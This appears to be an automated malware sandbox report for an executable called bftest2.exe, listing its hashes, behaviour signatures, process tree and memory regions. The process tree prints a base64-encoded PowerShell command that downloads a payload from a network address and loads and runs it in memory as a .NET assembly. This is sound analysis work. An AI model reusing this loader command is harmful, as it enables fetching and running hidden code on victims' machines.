Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    127s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/10/2023, 11:46

General

  • Target

    bftest2.exe

  • Size

    903KB

  • MD5

    20858fa8a2e9918c857206f98398a151

  • SHA1

    562a67caff70d05eb264a0e39bed80a36816a036

  • SHA256

    e7990b55b6db34aef4c6ef60351fbc3f19c4a451106b33aeaca4b68a674b84d1

  • SHA512

    936f4438ae97d707c4110e7d90a92d1fe3a6018cf4039b894e4a2d30e9f3f3d268ea3d6687e97630b28972abcd4ac0343b34da57d0bd42b0d90d5d01311518a8

  • SSDEEP

    24576:FSmvJ9Y5G1FOPjWcjL8TxNYqEv0rODHZ/lpWUmJKfplz7GknpD:FSmh9Y56OaccTtsWIZ/GUm0fpB7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bftest2.exe
    "C:\Users\Admin\AppData\Local\Temp\bftest2.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2204
    • \??\c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAGkAdwByACAALQB1AHIAaQAgAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADUAMwAuADcANgAuADEANwA2AC8AYgBmAHQAZQBzAHQAMwAuAHQAeAB0ACkALgBjAG8AbgB0AGUAbgB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAsACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAoACIALQBnAHIAbwB1AHAAPQBzAHkAcwB0AGUAbQAgAC0AbwB1AHQAZgBpAGwAZQA9AEMAOgBcAHQAZQBtAHAAXABiAGYAdABlAHMAdAAuAHQAeAB0ACIAKQApACkAKQAKAA==
      2⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4176

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Windows\Temp\__PSScriptPolicyTest_oiwn5yb3.wkw.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2204-1-0x00000246E2050000-0x00000246E2302000-memory.dmp

    Filesize

    2.7MB

  • memory/2204-3-0x00000246E2040000-0x00000246E2050000-memory.dmp

    Filesize

    64KB

  • memory/2204-0-0x00000246C7A80000-0x00000246C7B66000-memory.dmp

    Filesize

    920KB

  • memory/2204-5-0x00007FF94D130000-0x00007FF94DBF1000-memory.dmp

    Filesize

    10.8MB

  • memory/2204-2-0x00007FF94D130000-0x00007FF94DBF1000-memory.dmp

    Filesize

    10.8MB

  • memory/4176-15-0x0000016FB74E0000-0x0000016FB7502000-memory.dmp

    Filesize

    136KB

  • memory/4176-16-0x00007FF94CEF0000-0x00007FF94D9B1000-memory.dmp

    Filesize

    10.8MB

  • memory/4176-17-0x0000016FB74D0000-0x0000016FB74E0000-memory.dmp

    Filesize

    64KB

  • memory/4176-18-0x0000016FB74D0000-0x0000016FB74E0000-memory.dmp

    Filesize

    64KB

  • memory/4176-19-0x0000016FB74D0000-0x0000016FB74E0000-memory.dmp

    Filesize

    64KB

  • memory/4176-20-0x0000016FD2370000-0x0000016FD2B16000-memory.dmp

    Filesize

    7.6MB

  • memory/4176-22-0x0000016FD1E90000-0x0000016FD1F2A000-memory.dmp

    Filesize

    616KB

  • memory/4176-25-0x00007FF94CEF0000-0x00007FF94D9B1000-memory.dmp

    Filesize

    10.8MB